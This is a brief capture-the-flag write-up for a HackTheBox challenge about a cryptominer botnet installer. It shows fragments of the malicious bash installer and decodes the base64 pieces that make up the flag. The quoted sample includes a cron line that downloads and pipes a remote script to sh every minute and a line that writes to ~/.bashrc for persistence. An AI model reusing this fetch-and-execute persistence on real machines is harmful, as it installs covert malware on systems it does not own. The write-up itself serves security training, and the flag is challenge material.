Description
In the race for Vitalium on Mars, the villainous Board of Arodor resorted to desperate measures, needing funds for their mining attempts. They devised a botnet specifically crafted to mine cryptocurrency covertly. We stumbled upon a sample of Arodor’s miner’s installer on our server. Recognizing the gravity of the situation, we launched a thorough investigation. With you as its leader, you need to unravel the inner workings of the installation mechanism. The discovery served as a turning point, revealing the extent of Arodor’s desperation. However, the battle for Vitalium continued, urging us to remain vigilant and adapt our cyber defenses to counter future threats.
The Complete Practical Web Application Penetration Testing Course
The challenge shows a very long bash script which has some base64-encoded strings such as the ones below
local url=”http://tossacoin.htb/cGFydDI9Il90aDMxcl93NHkiCg==”
dest=$(echo “X3QwX200cnN9Cg==”|base64 -d)
echo “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d >> /home/$USER/.bashrc
echo ‘* * * * * $LDR http://tossacoin.htb/ex.sh | sh & echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d > /dev/null 2>&1’
All we have to do is to base64-decode those strings and gather the parts composing the final flag.
$ echo cGFydDI9Il90aDMxcl93NHkiCg== | base64 -d
$ echo “X3QwX200cnN9Cg==”|base64 -d
$ echo “ZXhwb3J0IHBhcnQ0PSJfdGgzX3IzZF9wbDRuM3R9Ig==” | base64 -d
$ echo -n cGFydDE9IkhUQnttMW4xbmciCg==|base64 -d
Final Flag
HTB{m1n1ng_th31r_w4y_t0_m4rs_th3_r3d_pl4n3t}
HackTheBox Video Walkthroughs Playlist
